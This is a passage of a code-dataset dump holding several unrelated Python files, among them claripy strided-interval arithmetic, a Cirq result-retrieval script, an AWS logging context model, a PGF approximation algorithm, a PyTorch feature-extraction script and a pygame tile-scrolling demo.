self.is_empty:\n            ret = b\n\n        elif b.is_empty:\n            ret = self\n\n        else:\n            new_stride = fractions.gcd(self.stride, b.stride)\n            l = StridedInterval.lower(self.bits, self.lower_bound, new_stride) if b.lower_bound < self.lower_bound else self.lower_bound\n            u = StridedInterval.upper(self.bits, self.upper_bound, new_stride) if b.upper_bound > self.upper_bound else self.upper_bound\n            if new_stride == 0:\n                if self.is_integer and b.is_integer:\n                    ret = StridedInterval(bits=self.bits, stride=1, lower_bound=l, upper_bound=u)\n                else:\n                    raise ClaripyOperationError('SI: operands are not reduced.')\n            else:\n                ret = StridedInterval(bits=self.bits, stride=new_stride, lower_bound=l, upper_bound=u)\n\n        ret.normalize()\n        return ret\n\n    def reverse(self):\n        \"\"\"\n        This is a delayed reversing function. All it really does is invert the _reversed property of this\n        StridedInterval object.\n\n        :return: A copy of self with the _reversed property inverted\n        \"\"\"\n        if self.bits == 8:\n            # Reversing a one-byte value is a no-op\n            return self.copy()\n\n        si = self.copy()\n        si._reversed = not si._reversed\n\n        return si\n\n    def _reverse(self):\n        \"\"\"\n        This method reverses the StridedInterval object for real. Expect a loss of precision in most cases!\n\n        :return: A new reversed StridedInterval instance\n        \"\"\"\n\n        o = self.copy()\n        # Flip the reversed flag\n        o._reversed = not o._reversed\n\n        if o.bits == 8:\n            # No need for reversing\n            return o.copy()\n\n        if o.is_top:\n            # A TOP is still a TOP after reversing\n            si = o.copy()\n            return si\n\n        else:\n            if not o.is_integer:\n                # We really don't want to do that... but well, sometimes it just happens...\n                logger.warning('Reversing a real strided-interval %s is bad', self)\n\n            # Reversing an integer is easy\n            rounded_bits = ((o.bits + 7) / 8) * 8\n            list_bytes = [ ]\n            si = None\n\n            for i in xrange(0, rounded_bits, 8):\n                b = o.extract(min(i + 7, o.bits - 1), i)\n                list_bytes.append(b)\n\n            for b in list_bytes:\n                si = b if si is None else si.concat(b)\n\n            return si\n\ndef CreateStridedInterval(name=None, bits=0, stride=None, lower_bound=None, upper_bound=None, uninitialized=False, to_conv=None):\n    '''\n    :param name: The name of the variable\n    :param bits: The bit width of the StridedInterval\n    :param stride: The stride\n    :param lower_bound: The lower bound\n    :param upper_bound: The upper bound\n    :param uninitialized: Whether the value is uninitialized\n    :param to_conv: An int, long, BVV, or StridedInterval to convert from (exclusive with the parameters above)\n    :return: A new StridedInterval\n    '''\n    if to_conv is not None:\n        if isinstance(to_conv, Base):\n            to_conv = to_conv.model\n        if isinstance(to_conv, StridedInterval):\n            # No conversion will be done\n            return to_conv\n\n        if type(to_conv) not in {int, long, BVV}: #pylint:disable=unidiomatic-typecheck\n            raise ClaripyOperationError('Unsupported to_conv type %s' % type(to_conv))\n\n        if stride is not None or lower_bound is not None or \\\n                upper_bound is not None:\n            raise ClaripyOperationError('You cannot specify both to_conv and other parameters at the same time.')\n\n        if type(to_conv) is BVV: #pylint:disable=unidiomatic-typecheck\n            bits = to_conv.bits\n            to_conv_value = to_conv.value\n        else:\n            bits = bits\n            to_conv_value = to_conv\n\n        stride = 0\n        lower_bound = to_conv_value\n        upper_bound = to_conv_value\n\n    bi = StridedInterval(name=name,\n                         bits=bits,\n                         stride=stride,\n                         lower_bound=lower_bound,\n                         upper_bound=upper_bound,\n                         uninitialized=uninitialized)\n    return bi\n\n\nfrom .errors import ClaripyVSAError\nfrom ..errors import ClaripyOperationError\nfrom .bool_result import TrueResult, FalseResult, MaybeResult\nfrom . 
import discrete_strided_interval_set\nfrom .discrete_strided_interval_set import DiscreteStridedIntervalSet\nfrom .valueset import ValueSet\nfrom ..ast.base import Base\nfrom ..bv import BVV\n","sub_path":"claripy/vsa/strided_interval.py","file_name":"strided_interval.py","file_ext":"py","file_size_in_byte":83086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"27832305","text":"# Copyright 2021 Phasecraft Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport cirq\n\nimport os\nimport json\nimport logging\nimport numpy as np\nimport pandas as pd\n\nlogger = logging.getLogger(\"fhvqe.retrieve_data\")\n\n# Constants\nCIRCUIT_JSON = \"circuit.json\"\nRESULTS_JSON = \"results.json\"\nPROJECT_ID = \"fermi-hubbard-vqe\"\nRESULTS_FOLDER = \"results\"\n\nproject_id = PROJECT_ID\nengine = cirq.google.Engine(project_id=project_id)\n\n\nprogram_id_filename = \"data/program_ids.csv\"\nfull_program_ids = []\nwith open(program_id_filename, \"r\") as pids:\n full_program_ids = [pid[:-1] for pid in pids]\n\ndef retrieve_historical_data(program_id, prefix=\"\"):\n \"\"\"Retrieve historical data for a given program_id\n\n Args:\n program_id -- The program_id as saved in jobs_xxx.json\n prefix -- The job prefix, e.g. \"tflo-\", \"noise-\", \"givens\" or ...\n\n Returns:\n (jobs, results) A list `jobs` containing all jobs with the \n given program_id and a list containing all the `result`s of \n these jobs.\n \"\"\"\n full_pids = list(filter(lambda pid: prefix+program_id in pid, full_program_ids))\n jobs = []\n print(f\"Program id: {program_id}. Prefix: {prefix}. Full pids: {list(full_pids)}\")\n for full_pid in full_pids:\n jobs += engine.get_program(program_id=full_pid).list_jobs()\n results = [job.results() for job in jobs]\n return jobs, results\n\n\ndef retrieve_historical_samples(program_id, prefix=\"\"):\n \"\"\"Retrieve historical samples for a given program_id\n\n Args:\n program_id -- The program_id as saved in jobs_xxx.json\n prefix -- The job prefix, e.g. \"tflo-\", \"noise-\", \"givens\" or ...\n\n Returns:\n `samples` A list of int16-matrices containing the samples ordered s.t. \n they are compatible with the observables in `scripts/analyse_results.py`\n \"\"\"\n jobs, results = retrieve_historical_data(program_id, prefix=prefix)\n print(f\"Retrieved {len(jobs)} jobs for program id {program_id} prefix {prefix}\")\n samples = results[0]\n samples = [s.measurements[\"x\"].astype(np.int16).T for s in samples]\n return samples\n\n\ndef load_samples_txt(filename):\n \"\"\"Load a samples.txt file to a list of numpy arrays\n\n Args:\n filename -- The `samples.txt` (or similar) filename containing the samples\n\n Returns:\n `samples` A list of int16-matrices containing the samples ordered s.t. 
\n they are compatible with the observables in `scripts/analyse_results.py`.\n \"\"\"\n with open(filename) as file:\n samples_blocks = file.read().split(\"\\n\\n\\n\")\n # delete last block if it is empty\n if len(samples_blocks[-1]) == 1: samples_blocks = samples_blocks[:-1]\n samples_list = [block.splitlines() for block in samples_blocks]\n samples = []\n for sample in samples_list:\n if len(sample) != 0:\n arr = np.empty((len(sample[0]), len(sample)), dtype=np.int16)\n for i in range(len(sample[0])):\n for j in range(len(sample)):\n arr[i,j] = sample[j][i]\n samples.append(arr)\n \n return samples\n\n# Allow this file to be run directly as a separate script.\nif __name__ == \"__main__\":\n # Change here:\n folder = \"heatmaps/4x1\"\n filename = \"jobs_4x1_2.json\"\n\n full_filename = os.path.join(folder, filename)\n results_folder = os.path.join(folder, RESULTS_FOLDER)\n if not os.path.exists(results_folder):\n os.makedirs(results_folder)\n\n with open(full_filename) as json_file:\n jobs_data = json.load(json_file)\n\n for j, job_data in enumerate(jobs_data):\n print(f\"[{j}/{len(jobs_data)-1}]\\r\", end=\"\")\n job_id = job_data[\"job_id\"]\n prog_id = job_data[\"prog_id\"]\n job = engine.get_program(program_id=prog_id).get_job(job_id=job_id)\n if job.status() == \"SUCCESS\":\n job_results = job.results()\n prog_folder = os.path.join(results_folder, prog_id)\n if not os.path.exists(prog_folder):\n os.makedirs(prog_folder)\n prog_data = cirq.to_json(job.program().get_circuit())\n with open(os.path.join(prog_folder, CIRCUIT_JSON), 'w') as outfile:\n json.dump(prog_data, outfile)\n with open(os.path.join(prog_folder, RESULTS_JSON), 'w') as outfile:\n json.dump(cirq.to_json(job_results), outfile)\n\n","sub_path":"fhvqe/retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"136763953","text":"\"\"\"\nModels for the 'Logger' decorator classes\n\n\"\"\"\n__all__ = ['LambdaContext', 'TaskContext', '_BaseContext']\n\nimport os\nfrom dataclasses import dataclass\nfrom typing import Callable, Dict, Optional, Any\n\nimport requests\n\nfrom .log import LOG\n\n\n@dataclass\nclass _BaseContext:\n \"\"\"\n Base Context class, which defines the minimum attributes that a Context\n object would be expected to contain.\n \"\"\"\n function_name: str\n\n\nclass TaskContext(_BaseContext):\n\n def __init__(self, fn: Callable):\n \"\"\"\n Create a :class:`TaskContext` object.\n \"\"\"\n super().__init__(fn.__qualname__)\n\n @classmethod\n def get_ecs_metadata(cls, endpoint_env_var='ECS_CONTAINER_METADATA_URI_V4'\n ) -> Optional[Dict[str, Any]]:\n \"\"\"\n Retrieve metadata for the ECS or Fargate task, if available.\n Uses the Task Metadata V4 endpoint.\n\n Ref: https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-v4-fargate.html\n \"\"\"\n metadata_url = os.getenv(endpoint_env_var)\n\n if not metadata_url:\n docs_link = ('https://docs.aws.amazon.com/AmazonECS/latest/userguide/'\n 'task-metadata-endpoint-v4-fargate.html')\n LOG.info(\n f'Environment variable \"{endpoint_env_var}\" not defined '\n 'in task; consider updating to platform version 1.4.0 to enable '\n 'this feature. 
Please refer to the following docs:\\n'\n f' {docs_link}')\n return\n\n return cls._retrieve_ecs_metadata(metadata_url)\n\n @staticmethod\n def _retrieve_ecs_metadata(metadata_url: str) -> Dict[str, Any]:\n \"\"\"\n Make a call to the ECS Metadata endpoint and return the result as a\n dictionary object.\n \"\"\"\n r = requests.get(metadata_url)\n r.raise_for_status()\n\n return r.json()\n\n\nclass LambdaContext(_BaseContext):\n\n def __init__(self, function_name: str,\n request_id=None, account_id=None, account_name=None):\n \"\"\"\n Create a :class:`LambdaContext` object.\n \"\"\"\n super().__init__(function_name)\n\n self.request_id = request_id\n self.account_id = account_id\n self.account_name = account_name\n","sub_path":"aws_teams_logger/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"142788311","text":"import numpy as np\nfrom scipy.special import gammaln\nfrom scipy.misc import factorial\nimport gdual as gd\n\nimport forward as fwd\n\n# get parameters of a poisson by matching moments with some dist'n p\ndef MM_Poiss(mean_p):\n lambda_q = mean_p\n theta_q = [lambda_q]\n\n return theta_q\n\n# get parameters of a nb by matching moments with some dist'n p\ndef MM_NB(mean_p, var_p):\n assert var_p > mean_p, 'Error in MM_NB: cannot approximate a distn with mean >= var'\n r_q = (mean_p ** 2) / (var_p - mean_p)\n p_q = 1 - (mean_p / var_p)\n theta_q = [r_q, p_q]\n\n return theta_q\n\n# get parameters of a binomial by matching moments with some dist'n p\ndef MM_Binom(mean_p, var_p):\n assert mean_p > var_p, 'Error in MM_Binom: cannot approximate a distn with mean <= var'\n\n n_q = mean_p / (1 - (var_p / mean_p))\n\n ###\n # note: for a binomial, n_q must be integral. 
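(For example, mean 4.0 with variance 2.0 gives n_q = 8.0 and p_q = 0.5 exactly, while mean 4.0 with variance 2.1 gives n_q of roughly 8.42, which is not a valid binomial n.) 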
Further examination is needed to determine the best/correct way,\n # but for now, I'm just rounding it to the nearest integer, then setting $p$ correspondingly\n ###\n\n n_q = np.round(n_q)\n p_q = mean_p / n_q\n theta_q = [n_q, p_q]\n\n return theta_q\n\ndef APGF(F_p, Z = None, GDualType = gd.LSGDual, return_type = ['name', 'param', 'lambda']):\n # compute the normalization constant for F if it wasn't provided\n if Z is None:\n Z = F_p(GDualType.const(1)).get(0, as_log=False)\n\n # renormalize the distribution before computing moments (this is now done later)\n # F_star = lambda s: F_p(s) / Z\n\n # construct M_p, the MGF of p, from F_p\n M_p = lambda t: F_p(np.exp(t))\n\n # use the MGF to compute the first k moments of p\n k = 2\n t0_gd = GDualType(0, q=k)\n\n # extract the moments (note the renormalization by logZ)\n # note: this assumes the mean and variance of F_p are >= 0, which they should be for a count distribution\n # but we go ahead and force that for stability reasons\n moments_p = M_p(t0_gd)\n # log_moments_p.trunc_neg_coefs()\n moments_p = np.exp(moments_p.get(range(1,k+1), as_log=True) + gammaln(np.arange(2, k + 2)) - np.log(Z))\n\n mean_p = moments_p[0]\n var_p = moments_p[1] - (mean_p ** 2)\n\n # mean_p = np.exp(log_mean_p)\n # var_p = np.exp(log_var_p)\n\n assert np.isfinite(mean_p) and np.isfinite(var_p)\n\n # assert not np.isposinf(log_mean_p) and not np.isnan(log_mean_p)\n # assert not np.isposinf(log_var_p) and not np.isnan(log_var_p)\n\n # if mean and var are \"close\" (to numerical stability) treat them as equal\n if np.abs(mean_p - var_p) < 1e-6:\n # if True:\n distn = 'poiss'\n theta = MM_Poiss(mean_p)\n lmbda = lambda s, theta = theta, Z = Z: Z * fwd.poisson_pgf(s, theta)\n elif mean_p < var_p:\n distn = 'nb'\n theta = MM_NB(mean_p, var_p)\n lmbda = lambda s, theta = theta, Z = Z: Z * fwd.negbin_pgf(s, theta)\n elif mean_p > var_p:\n distn = 'binom'\n theta = MM_Binom(mean_p, var_p)\n lmbda = lambda s, theta = theta, Z = Z: Z * fwd.binomial_pgf(s, theta)\n else:\n raise Exception('Unable to approximate PGF.')\n\n return_vals = {'name': distn, 'param': theta, 'lambda': lmbda}\n return([return_vals[key] for key in return_type])\n\ndef APGF_Forward_symb(y,\n immigration_pgf,\n theta_immigration,\n offspring_pgf,\n theta_offspring,\n rho,\n GDualType=gd.LSGDual):\n K = len(y)\n\n ### reverse pass to compute all of the s, u arguments to Gamma, Alpha\n # s = [None] * (K + 1)\n # u = [None] * K\n # s[K] = GDualType.const(1.0)\n #\n # for i in range(1, K):\n # u[-i] = s[-i] * (1 - rho[-i])\n # s[-i-1] = offspring_pgf(u[-i], theta_offspring[-i])\n\n ### forward pass to evaluate Alpha, Gamma\n # Alpha_vec = [None] * K\n Gamma_vec = [None] * K\n Z_vec = [None] * K\n # Gamma_hat_vec = [None] * K\n\n Alpha_lmbda_vec = [None] * K\n\n for i in range(K):\n # compute the Gamma message given Alpha[i] = Alpha_{i-1}(s_{i-1})\n if i == 0:\n Gamma_vec[i] = lambda u, k=i: immigration_pgf(u, theta_immigration[k])\n else:\n Gamma_vec[i] = lambda u, k=i: Alpha_lmbda_vec[k-1](offspring_pgf(u, theta_offspring[k-1])) * immigration_pgf(u, theta_immigration[k])\n\n # compute Gamma_hat, the approximating distribution, using APGF\n Z_vec[i] = Gamma_vec[i](GDualType.const(1)).get(0, as_log=False)\n Gamma_hat = APGF(Gamma_vec[i], Z_vec[i], GDualType = GDualType, return_type = ['name', 'param'])\n Gamma_hat_distn = Gamma_hat[0]\n Gamma_hat_theta = Gamma_hat[1]\n\n # use Gamma_hat to construct the next Alpha message\n if Gamma_hat_distn == 'poiss':\n Alpha_lmbda_vec[i] = lambda s_k, k=i, lmbda = 
Gamma_hat_theta[0]: \\\n GDualType.const(np.log(Z_vec[k]) + y[k] * (np.log(lmbda) + np.log(rho[k])) - lmbda - gammaln(y[k] + 1), as_log=True) \\\n * (s_k ** y[k]) * np.exp(lmbda * (1 - rho[k]) * s_k)\n elif Gamma_hat_distn == 'nb':\n Alpha_lmbda_vec[i] = lambda s_k, k=i, r=Gamma_hat_theta[0], p=Gamma_hat_theta[1]: \\\n GDualType.const(np.log(Z_vec[k]) + y[k] * (np.log(1 - p) + np.log(rho[k])) + r * np.log(p) + gammaln(r + y[k]) - gammaln(y[k] + 1) - gammaln(r), as_log=True) \\\n * (s_k ** y[k]) * ((1 - (1 - rho[k]) * (1 - p) * s_k) ** (-r - y[k]))\n elif Gamma_hat_distn == 'binom':\n Alpha_lmbda_vec[i] = lambda s_k, k=i, n=Gamma_hat_theta[0], p=Gamma_hat_theta[1]: \\\n GDualType.const(np.log(Z_vec[k]) + y[k] * (np.log(p) + np.log(rho[k])) + gammaln(n + 1) - gammaln(y[k] + 1) - gammaln(n - y[k] + 1), as_log=True) \\\n * (s_k ** y[k]) * ((1 - p + (p * (1 - rho[k]) * s_k)) ** (n - y[k]))\n\n return Alpha_lmbda_vec[-1](GDualType.const(1.0))\n\n# def APGF_Forward_symb(y,\n# immigration_pgf,\n# theta_immigration,\n# offspring_pgf,\n# theta_offspring,\n# rho,\n# GDualType=gd.LSGDual,\n# d=0):\n# def Gamma_k(u_k, k):\n# s_kminus1 = offspring_pgf(u_k, theta_offspring[k-1])\n# return Alpha_k(s_kminus1, k - 1) * immigration_pgf(u_k, theta_immigration[k])\n#\n# def Alpha_k(s_k, k):\n# # base case, Alpha_0 = 1.0\n# if k < 0:\n# return GDualType.const(1.0, q = s_k.order())\n#\n# u_k = s_k * (1 - rho[k])\n# Gamma = lambda u, k=k: Gamma_k(u, k)\n#\n# # select a parametric distn to approximate Gamma\n# gamma_logZ = Gamma(GDualType.const(1)).get(0, as_log=True)\n# apgf_res = APGF(Gamma, gamma_logZ, GDualType=GDualType, return_type=['name', 'param'])\n# apgf_distn = apgf_res[0]\n# apgf_theta = apgf_res[1]\n#\n# # compute the parts of A_k that don't depend on Gamma\n# val = s_k ** y[k]\n# val *= GDualType.const(y[k] * np.log(rho[k]) - gammaln(y[k] + 1), as_log=True)\n#\n# # add the parts that depend on Gamma\n# if apgf_distn == 'poiss':\n# lmbda = apgf_theta[0]\n# # const parts\n# val *= GDualType.const(y[k] * np.log(lmbda) - lmbda, as_log = True)\n# # gdual parts\n# val *= np.exp(s_k * lmbda * (1 - rho[k]))\n# elif apgf_distn == 'nb':\n# r = apgf_theta[0]\n# p = apgf_theta[1]\n# # const parts\n# val *= GDualType.const(r * np.log(p) + y[k] * np.log(1 - p) + gammaln(r + y[k]) - gammaln(r), as_log = True)\n# # gdual parts\n# val *= (1 - (1 - rho[k]) * (1 - p) * s_k) ** (-r - y[k])\n# elif apgf_distn == 'binom':\n# n = apgf_theta[0]\n# p = apgf_theta[1]\n# # const parts\n# val *= GDualType.const(y[k] * np.log(p) + gammaln(n + 1) - gammaln(n - y + 1), as_log = True)\n# # gdual parts\n# val *= (1 - p + p * (1 - rho[k]) * s_k) ** (n - y[k])\n#\n# val /= GDualType.const(gamma_logZ, as_log = True)\n#\n# return val\n#\n# K = len(y)\n# A_K = Alpha_k(GDualType.const(1.0), K - 1)\n#\n# return A_K\n\nif __name__ == '__main__':\n # currently np.exp(any LSGDual) throws this warning, but it can be ignored until we figure out why it happens\n import warnings\n warnings.filterwarnings(\"ignore\", category=RuntimeWarning, message=\"divide by zero encountered in exp\")\n\n import time\n\n # F = lambda s: fwd.binomial_pgf(s, [10000, 0.2])\n #\n # print(APGF(F))\n #\n # F = lambda s: fwd.poisson_pgf(s, [10000])\n #\n # print(APGF(F))\n #\n # F = lambda s: fwd.negbin_pgf(s, [10000, 0.2])\n #\n # print(APGF(F))\n #\n # F = lambda s: fwd.geometric2_pgf(s, [0.3])\n #\n # print(APGF(F))\n #\n # F = lambda s: 1/156 * fwd.poisson_pgf(s, [10000])\n #\n # print(APGF(F))\n\n y = 10 * np.array([1, 2, 3, 1, 3])\n lmbda = 10 * np.array([2.5, 
6, 6, 6, 6]).reshape(-1, 1)\n    delta = np.array([0.5, 0.5, 0.5, 0.5]).reshape(-1, 1)\n    rho = np.array([0.2, 0.2, 0.2, 0.2, 0.2])\n\n    start = time.process_time()\n    for rep in range(3):\n        A = APGF_Forward_symb(y,\n                              fwd.poisson_pgf,\n                              lmbda,\n                              fwd.bernoulli_pgf,\n                              delta,\n                              rho,\n                              GDualType=gd.LSGDual)\n    print(time.process_time() - start)\n\n    # print(A.get(0, as_log = True))\n    #\n    start = time.process_time()\n    for rep in range(3):\n        logZ, alpha, marginals = fwd.forward(y,\n                                             fwd.poisson_pgf,\n                                             lmbda,\n                                             fwd.bernoulli_pgf,\n                                             delta,\n                                             rho,\n                                             GDualType=gd.LSGDual,\n                                             d=0)\n    print(time.process_time() - start)\n    # print(logZ)\n\n    from apgf_forward_log import APGF_Forward\n\n    start = time.process_time()\n    for rep in range(3):\n        res = APGF_Forward(y,\n                           fwd.poisson_pgf,\n                           lmbda,\n                           fwd.bernoulli_pgf,\n                           delta,\n                           rho,\n                           GDualType=gd.LSGDual,\n                           d=0)\n    print(time.process_time() - start)\n\n    # print(res)","sub_path":"python/deprecated/apgf_forward_symb_log0.py","file_name":"apgf_forward_symb_log0.py","file_ext":"py","file_size_in_byte":10756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"90552753","text":"from utils import *\r\nfrom net import *\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport numpy as np\r\nimport torch\r\nimport os\r\nimport glob\r\nimport torch.nn as nn\r\nimport argparse\r\ndevice = ('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\nparser = argparse.ArgumentParser()\r\n\r\nparser.add_argument('--backbone', type=str, default='vgg19',\r\n                    help='backbone') #'vgg19' or 'googlenet'\r\nparser.add_argument('--split', type=str, default='test',\r\n                    help='split')\r\n\r\nconfig = parser.parse_args(args=[])\r\n\r\nclass my_dataset(Dataset):\r\n    def __init__(self, store_path, split, name, data_transform=None):\r\n        self.store_path = store_path\r\n        self.split = split\r\n        self.transforms=data_transform\r\n        self.names = name\r\n        self.data_list = []\r\n        self.label_list = []\r\n        for n,i in enumerate(self.names):\r\n            if split =='train':\r\n                for file in glob.glob(self.store_path + '/' + split +'/'+i+ '/*.npy'):\r\n                    cur_path = file.replace('\\\\', '/')\r\n                    if n==4:\r\n                        for j in range(10):\r\n                            self.data_list.append(cur_path)\r\n                            self.label_list.append(n)\r\n                    else:\r\n                        self.data_list.append(cur_path)\r\n                        self.label_list.append(n)\r\n            else:\r\n                for file in glob.glob(self.store_path + '/' + split +'/'+i+ '/*.npy'):\r\n                    cur_path = file.replace('\\\\', '/')\r\n                    self.data_list.append(cur_path)\r\n                    self.label_list.append(n)\r\n\r\n\r\n    def __getitem__(self, item):\r\n        data = self.transforms(self.data_list[item])\r\n        label = self.label_list[item]\r\n        return data, label\r\n\r\n    def __len__(self):\r\n        return len(self.data_list)\r\n\r\ndef save_feature(feature,target,n):\r\n    # Save the preprocessed feature to the folder of the corresponding class label\r\n    target=target.cpu().numpy()\r\n    np.save(os.getcwd()+'/'+config.backbone+'/'+config.split+'/'+'00'+str(target)+'/'+'feature'+str(n)+'_'+str(target)+'.npy',feature)\r\n\r\n\r\n\r\ndef pre_function(inputs,targets,model,n):\r\n    # Preprocessing function: run both input channels through the backbone and save the features\r\n    inputs=inputs.to(device)\r\n    targets=targets.to(device)\r\n    inputs=inputs.squeeze(1)\r\n    for b in range(inputs.shape[0]):\r\n        feature=np.zeros((4,1,14336))\r\n        for i in range(inputs.shape[1]):\r\n            inputs1=inputs[b, i, :, :, 0].unsqueeze(0)\r\n            inputs2=inputs[b, i, :, :, 1].unsqueeze(0)\r\n            input1=torch.from_numpy(np.zeros((1,3,224,224)).astype(np.float32)).to(device)\r\n            input1[0,0, :, :] = inputs1\r\n            input1[0,1, :, :] = inputs1\r\n            input1[0,2, :, :] = inputs1\r\n            input2 = torch.from_numpy(np.zeros((1,3, 224, 
224)).astype(np.float32)).to(device)\r\n            input2[0,0,:,:]=inputs2\r\n            input2[0,1, :, :] = inputs2\r\n            input2[0,2, :, :] = inputs2\r\n            T=ready_for_MTLN(input1,input2,model)\r\n            feature[i]=T.detach().cpu().numpy()\r\n        save_feature(feature,targets[b],n)\r\n        n+=1\r\n    return n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    split = config.split\r\n    store_path = './data'\r\n    name=['000','001','002','003','004']\r\n    if split=='train':\r\n        train_dataset =my_dataset(store_path, split, name, pre_treat_train)\r\n    else:\r\n        train_dataset = my_dataset(store_path, split, name, pre_treat_test)\r\n    # Load the pretrained parameters of the chosen backbone network below\r\n    if config.backbone=='vgg19':\r\n\r\n        model_before=models.vgg19(pretrained=True)\r\n        t=[]\r\n        for i,layer in enumerate(model_before.children()):\r\n            for j,sublayer in enumerate(layer.children()):\r\n                if i==0 and j<30:\r\n                    t.append(sublayer)\r\n        model = nn.Sequential(*t)\r\n\r\n    else:\r\n        model_before = models.googlenet(pretrained=True)\r\n        model = nn.Sequential(*list(model_before.children())[0:11])\r\n\r\n    model = model.to(device)\r\n    n=0\r\n    dataset_loader = DataLoader(train_dataset, batch_size=1, shuffle=True, num_workers=0)\r\n    for inputs,targets in dataset_loader:\r\n        n=pre_function(inputs,targets, model,n)","sub_path":"pretreat.py","file_name":"pretreat.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"14176936","text":"## tileFactory.py\r\n## Andrew Herrera and Benjamin Rose\r\n## Fall 2016\r\n\r\n# Example of a call:\r\n# temp_row = randint(1,6)\r\n# tile1 = tileFactory(140, 1, temp_row)\r\n# tiles_list.append(tile1)\r\n# possible \"tile\" + str(tile_count) = tileFactory(140, 1, temp_row)\r\n\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\nfrom random import randint\r\n\r\nBLACK = (0, 0, 0)\r\n\r\nDISPLAYSURF = pygame.display.set_mode((1280, 720))\r\nDISPLAYSURF.fill(BLACK)\r\n\r\n\r\nclass tileFactory(object):\r\n    def __init__(self, scrollspeed, tankorfighterlevel, tilerow):\r\n        self.scroll = scrollspeed\r\n        self.torf = tankorfighterlevel\r\n        self.scrolled_amount = 0\r\n        self.pixel_frac_balance = 1\r\n        row_assigned = 0\r\n        TILESIZE = 140\r\n        self.DRAWDISTANCE = 2000\r\n        # If there are performance problems, lowering the draw distance\r\n        # should help. But it should never go below DISPLAYHEIGHT + 140.\r\n        \r\n        if tilerow == 6 and row_assigned == 0:\r\n            self.row = 0\r\n            row_assigned = 1\r\n        # It's easier to think about the tile rows as going from row 1, the\r\n        # lowest, to row 6, the highest, but calculations are easier if it goes\r\n        # from 0 being the top row to 5 being the bottom row. 
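(For instance, input row 1, the lowest on screen, becomes internal row 5, and input row 6 becomes internal row 0.) 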
This part allows\r\n # the input to be the easier-to-think-about one and then simply\r\n # changes the row value to the one far more convenient for in-code\r\n # uses.\r\n elif tilerow == 5 and row_assigned == 0:\r\n self.row = 1\r\n row_assigned = 1\r\n elif tilerow == 4 and row_assigned == 0:\r\n self.row = 2\r\n row_assigned = 1\r\n elif tilerow == 3 and row_assigned == 0:\r\n self.row = 3\r\n row_assigned = 1\r\n elif tilerow == 2 and row_assigned == 0:\r\n self.row = 4\r\n row_assigned = 1\r\n elif tilerow == 1 and row_assigned == 0:\r\n self.row = 5\r\n row_assigned = 1\r\n\r\n self.pos = (self.DRAWDISTANCE, int(self.row * TILESIZE))\r\n\r\n self.TILESURF = pygame.Surface((TILESIZE, TILESIZE))\r\n self.TILESURF = pygame.image.load(\"tile.png\")\r\n self.TILESURF = pygame.transform.scale(self.TILESURF, (TILESIZE, TILESIZE))\r\n TILESURF = self.TILESURF\r\n\r\n def pos_change(self):\r\n\r\n if self.torf == 1:\r\n self.pixel_scroll_num = 2\r\n if self.pixel_frac_balance == 3:\r\n self.pixel_scroll_num = 3\r\n self.pixel_frac_balance = 1\r\n else:\r\n self.pixel_frac_balance += 1\r\n # Balances out the cut-off 0.33 pixel lost at a scroll rate of\r\n # 140 / 60 (2.33 pixels) per frame. If the scroll speed is\r\n # adjusted, this part will need to be tweaked slightly.\r\n self.scrolled_amount += self.pixel_scroll_num\r\n self.pos = (self.DRAWDISTANCE - self.scrolled_amount, self.pos[1])\r\n pos = self.pos\r\n\r\n if self.torf == 2:\r\n pass\r\n # Will be written once fighter scroll speed is determined.\r\n\r\ndef main():\r\n tile_list = []\r\n## tile1 = tileFactory(140, 1, 1)\r\n## tile_list.append(tile1)\r\n t = 0\r\n tile_make_in = 0\r\n tm = [0, 0, 0, 0, 0]\r\n## \r\n## for x in range(5):\r\n## temp_row = randint(1, 6)\r\n## tile_list[x] = tileFactory(140, 1, temp_row)\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n pygame.time.wait(17)\r\n t += 1\r\n\r\n if tile_make_in == 61:\r\n temp_row = randint(1, 6)\r\n # tile_list starts empty, so indexing (tile_list[x] = ...) raises IndexError; append instead\r\n tile_list.append(tileFactory(140, 1, temp_row))\r\n tile_make_in = 0\r\n \r\n tile_make_in += 1\r\n\r\n## if t >= 60 and t < 120 and tm[0] == 0:\r\n## tile2 = tileFactory(140, 1, 2)\r\n## tile_list.append(tile2)\r\n## tm[0] = 1\r\n## elif t >= 120 and t < 180 and tm[1] == 0:\r\n## tile3 = tileFactory(140, 1, 3)\r\n## tile_list.append(tile3)\r\n## tm[1] = 1\r\n## elif t >= 180 and t < 240 and tm[2] == 0:\r\n## tile4 = tileFactory(140, 1, 4)\r\n## tile_list.append(tile4)\r\n## tm[2] = 1\r\n## elif t >= 240 and t < 300 and tm[3] == 0:\r\n## tile5 = tileFactory(140, 1, 5)\r\n## tile_list.append(tile5)\r\n## tm[3] = 1\r\n## elif t >= 300 and tm[4] == 0:\r\n## tile6 = tileFactory(140, 1, 6)\r\n## tile_list.append(tile6)\r\n## tm[4] = 1\r\n \r\n \r\n for tile in tile_list:\r\n tile.pos_change()\r\n DISPLAYSURF.fill(BLACK)\r\n for tile in tile_list:\r\n DISPLAYSURF.blit(tile.TILESURF, tile.pos)\r\n \r\n 